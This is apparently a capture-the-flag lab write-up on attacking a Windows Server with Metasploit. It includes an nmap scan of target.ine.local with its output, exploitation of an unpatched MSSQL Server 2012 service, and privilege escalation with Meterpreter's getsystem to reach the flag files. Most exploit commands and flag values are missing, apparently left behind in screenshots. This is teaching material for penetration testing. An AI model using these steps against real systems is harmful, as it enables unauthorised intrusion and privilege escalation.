Host & Network Penetration Testing: The Metasploit Framework CTF 1

Windows systems are common targets in penetration testing due to their extensive use in corporate environments. This lab focuses on exploiting Windows-based services and configurations using the Metasploit Framework (MSF). Participants will gain hands-on experience accessing vulnerable services, exploring sensitive directories, and escalating privileges to retrieve hidden information.

The objective is to highlight the risks associated with misconfigured accounts, exposed directories, and improper privilege management in Windows environments.

In this lab environment, you will have GUI access to a Kali machine. The target machine will be accessible at target.ine.local.

Objective: Use Metasploit and manual investigation techniques to capture the following flags:

• Flag 1: Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

• Flag 2: Locate the second flag within the Windows configuration folder.

• Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

• Flag 4: Investigate the Administrator directory to find the fourth flag.

Scanning

┌──(root㉿INE)-[~]
└─# sudo nmap -sC -sV -O target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-14 17:55 IST
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.48% done; ETC: 17:56 (0:00:00 remaining)
Nmap scan report for target.ine.local (10.5.24.70)
Host is up (0.0022s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2012 11.00.6020.00; SP3
| ms-sql-info: 
|   10.5.24.70\MSSQLSERVER: 
|     Instance name: MSSQLSERVER
|     Version: 
|       name: Microsoft SQL Server 2012 SP3
|       number: 11.00.6020.00
|       Product: Microsoft SQL Server 2012
|       Service pack level: SP3
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
| ms-sql-ntlm-info: 
|   10.5.24.70\MSSQLSERVER: 
|     Target_Name: WIN-5BQ22OKH4SO
|     NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
|     NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
|     DNS_Domain_Name: WIN-5BQ22OKH4SO

Now that we know MSSQL Server is running on port 1433, and the version is SQL Server 2012 (11.00.6020.00; SP3), we can search for an exploit based on this version.

Exploiting MSSQL server

we have a MSSQL vulnerability available in metasploit available.

To do this, we can use Metasploit. Start Metasploit by typing: msfconsole use metasploit. Once inside Metasploit, search for available exploits related to MSSQL 2012 using search MSSQL 2012

• Selected the exploit and set parameters:

and we have a session.

Navigate to root directory and get the first flag.

For the second flag, we want to check the Windows configuration folder, which is usually found in the System32 directory. To navigate to it, type the following command: cd Windows\System32

Privilege Escalation using getsystem

We don’t have access to view the contents. To check this, we need to first review our privileges. Let’s get back to our Meterpreter session by using Ctrl + C. Then, type getprivs to view the privileges that the current user has.

These privs are for the user. We can use getsystem to elevate the privileges because if SeImpersonatePrivilege is present, getsystem is likely to succeed using Named Pipe Impersonation.

We have elevated our privileges. Now, we can use the shell command again to get the shell and continue searching for the second flag.

We have successfully entered the config directory. Type dir to list the contents.

We have found the second flag. To read its contents, use the command type flag2.txt.

Searching recursively for flag

The question states that the third flag is also hidden within the system directory, but we don’t know its exact location. However, we know that the flag files end with .txt. To search for those files, use the following command:

This command will search for all .txt files within the System32 directory and its subdirectories.

We see a file named EscalatePrivilageToGetThisFlag.txt. To read its contents, type the following command:

Flag 4: Administrator’s Desktop

Since we have already elevated our privileges, let’s navigate to the Administrator directory to find the fourth flag.

To list the contents, type dir. Let's navigate to the Desktop directory.

And here we have found our last flag, which is: